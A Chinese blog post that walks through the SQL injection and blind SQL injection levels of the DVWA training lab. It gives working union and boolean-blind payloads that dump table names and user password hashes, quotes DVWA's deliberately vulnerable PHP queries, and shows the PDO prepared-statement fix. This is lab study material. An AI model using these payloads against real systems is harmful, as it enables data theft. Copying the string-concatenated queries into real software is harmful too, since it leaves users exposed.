DVWA攻略-03-SQL显错or 盲注

最新推荐文章于 2023-04-12 15:08:47 发布
最新推荐文章于 2023-04-12 15:08:47 发布
阅读量201 收藏
点赞数
分类专栏: # DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107364073
版权

文章目录

6.SQL Injection

参考链接:DVWA SQL Injection 通关教程

6.1、low

在这里插入图片描述
$_REQUEST请求方式,单引号闭合,且无过滤,因此可以直接进行union注入。、

在这里插入图片描述
可见列名为2.

爆数据库名称与用户名称

-1' union select database(),user() #

在这里插入图片描述
爆数据库中的表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

在这里插入图片描述
爆指定表中的列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

在这里插入图片描述

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='guestbook‘ #

在这里插入图片描述
获取字段的值

-1' union select group_concat(user),group_concat(password) from users #

在这里插入图片描述

6.2、medium-mysqli_real_escape_string

语法:mysqli_real_escape_string(connection,escapestring);

参数描述
connection必需。规定要使用的 MySQL 连接。
escapestring必需。要转义的字符串。编码的字符是 NUL(ASCII 0)、\n、\r、\、’、" 和 Control-Z。

在这里插入图片描述

POST请求方式,字符型闭合,还添加了一个过滤的字符函数mysqli_real_escape_string()。

在这里插入图片描述

在这里插入图片描述

6.3、high

在这里插入图片描述
请求方式为$_ SESSION,单引号闭合,无过滤。

可以看到,与Low Secuity Level的代码相比,Medium Secuity Level的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。

1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

6.4、impossiable

采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了”脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

<?php
/*Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,*/
if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		print_r($db);
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();


		// Make sure only 1 result is returned
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];

			// Feedback for end user
			$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

7.SQL Injection(Blind)

参考文献:DVWA SQL Injection(Blind) 通关教程
作者:御用闲人

7.1、low

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
	// Get input
	$id = $_GET[ 'id' ];

	// Check database
	$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

	// Get results
	$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
	if( $num > 0 ) {
		// Feedback for end user
		$html .= '<pre>User ID exists in the database.</pre>';
	}
	else {
		// User wasn't found, so the page wasn't!
		header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

		// Feedback for end user
		$html .= '<pre>User ID is MISSING from the database.</pre>';
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

由源码可见,与上面的显错注入源码类似,均没有进行参数过滤,且闭合方式也为单引号闭合;但是在这里并不会输出数据库的数据与数据库的报错提示,只会显示输入的id是否在数据库中。如下图。
在这里插入图片描述

在这里我们可以利用布尔注入逐个猜解数据库名的每个字母。例如:

1' and ascii(substr(database(),1,1))>97#

在这里插入图片描述

7.2、medium

利用mysqli_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
在这里插入图片描述
闭合方式为数字型。

7.3、high

利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
	// Get input
	$id = $_COOKIE[ 'id' ];

	// Check database
	$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

	// Get results
	$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
	if( $num > 0 ) {
		// Feedback for end user
		$html .= '<pre>User ID exists in the database.</pre>';
	}
	else {
		// Might sleep a random amount
		if( rand( 0, 5 ) == 3 ) {
			sleep( rand( 2, 4 ) );
		}

		// User wasn't found, so the page wasn't!
		header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

		// Feedback for end user
		$html .= '<pre>User ID is MISSING from the database.</pre>';
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

在这里插入图片描述

7.4、impossiable

采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();

		// Get results
		if( $data->rowCount() == 1 ) {
			// Feedback for end user
			$html .= '<pre>User ID exists in the database.</pre>';
		}
		else {
			// User wasn't found, so the page wasn't!
			header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

			// Feedback for end user
			$html .= '<pre>User ID is MISSING from the database.</pre>';
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>
xor0ne_10_01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透学习笔记3——报错注入和盲注
林林木林林L的博客
07-23 656
报错注入 报错注入原理 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息 常用的报错函数 updatexml() updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数; and updatexml(xml_document,Xpathstring,new_value) updatexml(1,concat(0
四、注入(4)盲注
weixin_45540609的博客
04-17 409
一、盲注介绍 盲注对应的是显错注入和报错注入 union select 联合查询注入 updatexml 报错注入 只会返回两种状态: 1、有数据回显 2、无数据回显 当页面没有任何回显点,且使用报错注入也无效时,使用盲注 盲注分类: 1、布尔型盲注 布尔:数据类型,返回0或1 2、时间型盲注 二、盲注需要掌握的的函数 lenth() 返回字符串长度 substr() 截取字符串,语法:SUBSTR(str,pos,len); ascii() 返回字符的ascii码...
SQL注入——盲注
weixin_41487522的博客
04-14 301
SQL注入——盲注 盲注介绍 提到盲注,对应的就是显错注入,显错注入之前我们说过。但是很多时候服务器关闭了错误回显,这时候我们就需要用到盲注。 所谓的盲注就是在服务器没有错误回显的情况下完成注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔盲注: 布尔就是true和flase,也就是说它只会根据你的注入信息返回true或false,也就没有了之前的报错信息。 时间盲注...
网络安全从入门到精通(第五章-4)盲注
划水的小白白
01-30 456
本文内容: 注入全方位之盲注 ~盲注介绍 ~盲注需要掌握的几个函数 ~延时注入(时间注入)做法 ~我的理解 每日一句: 谷歌和百度是我们最好的老师
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5553
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
这个平台提供了多种类型的SQL注入场景,包括盲注、时间基注入、联合查询注入等,帮助用户深入理解SQL注入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL Injection(SQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
【数据库连接问题】【靶场访问错误】Table ‘xxx‘ doesn‘t exist,文件‘Not Find‘ 可能是管理软件与终端本身的一个连接问题
04-06 5882
MySQL和phpstudy之间的尔虞我诈……
服务连接数据库提示“Table ‘test.User‘ doesn‘t exist”
nanhavezhi的博客
04-12 3621
查看到test库中包含user表,而没有User表,从业务中确认user表即为User表,则mysql数据库开启了大小写区分的功能,1. 修改mysql配置配置:vi /etc/mysql/mysql.conf.d/mysqld.cnf。注意:以上方法是有vi或vim编辑器的情况下做的,用容器跑起来的不存在vi/vim编辑器。4. 重启mysql服务:service mysql restart。登录到mysql‘数据库,进入到对应的库里,查看别=表。解决方案:修改区分大小写配置。修改完后,重启mysql
Table ‘mysql.user‘ doesn‘t exist
懵萌长颈鹿的博客
02-02 1696
mysql无法启动
Error【1146】:Table ‘xxx.xxx‘ doesn‘t exist问题原因及解决方法
热门推荐
weixin_42220953的博客
08-10 3万+
打开表的右键对象信息,可以查到类型。 方法三:拷贝缺失文件(最常用方法) 原理: 当表类型是MyISAM时,数据文件则以”Table.frm””Table.MYD””Table.MYI””三个文件存储于”/data/$databasename/”目录中。 当表类型是InnoDB时,数据文件则存储在”$innodb_data_home_dir/″中的ibdata1文件中(一般情况),结构文件存在于table_name.frm中。 MySQL的数据库文件直接复制便可以使用,但是那是指“MyISAM”类型的
SQL注入基础 知识
zhuangsle的博客
08-25 855
 SQL注入基础知识 一、SQL注入的原理 (一)注入原理 1、一句话总结 sql注入存在于前后端数据交互中,前端用户输入的数据(或参数)没有经过严格处理,直接交给执行(即带入数据进行相关的操作)。 2、产生原因 后端接受前端用户相关的参数,没有经过严格的处理,就直接带入数据库操作。 3、SQL注入攻击的必要条件 明确web应用程序所使用的技术,例如php+mysql,asp+mssql等; 确定前端提交数据的方式与位
SQL注入攻击
05-20 226
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 对于初学者而言,找漏洞最好是基于白盒审计进行...
DVWA通关--SQL注入(SQL Injection)
箭雨镜屋
01-26 1万+
LOW 通关步骤 1、找闭合 输入1' 报错 输入1'',不报错,说明闭合是单引号 2、确定列数 输入1' order by 2#,返回正确结果 输入1' order by 3#,报错,说明只有两列 3、 sql注入时union出错(Illegal mix of collations for operation UNION) 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析 总结 ...
防御sql注入之参数化查询
m0_55306747的博客
11-26 4701
概念:在sql语句中需要输入值的地方以参数进行给值 特点:和以往用变量传递拼接出完整的sql语句后再直接执行该语句(拼接后的语句整体会一同参与数据库sql语句的编译过程)不同的是:值的给定会在数据库编译完sql语句后,也就是说,参数中的值并不参与sql语句的编译过程,自然其中的语句就无法被执行,也就避免了sql注入 现状:不过即使参数化查询被证明可以十分有效的抵御sql注入攻击的情况下,依然有很多网站因为开发不方便或者开发成本提高而不使用参数化查询 需要熟悉各数据库中的变量形式: 假设变量为a1
sqllibs-Less05-06盲注方法拓展
Xor0ne
07-11 415
二、盲注 文章目录二、盲注5.Less055.1、报错尝试5.2、数据库相关信息显示1、查看数据库长度 `length(database()) > 7`2.逐个数据库版本号3.利用substr()、asscii()、regexp函数进行尝试4、利用ord()和mid()函数获取users表的内容5、报错注入:floor、exp(double超出范围)、bigint溢出、xpath报错注入(extractvalue、updatexml)、数据的重复性6、延时注入if-sleep()、if-benchm
python的sql盲注dvwa
最新发布
09-23
Python的SQL盲注是指通过构造特定的SQL语句来绕过应用程序的安全机制,并获取未经授权的数据。在DVWA漏洞测试环境中进行SQL盲注,可以使用sqlmap工具。下面是使用sqlmap进行DVWASQL盲注的步骤: 1. 首先,确保你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值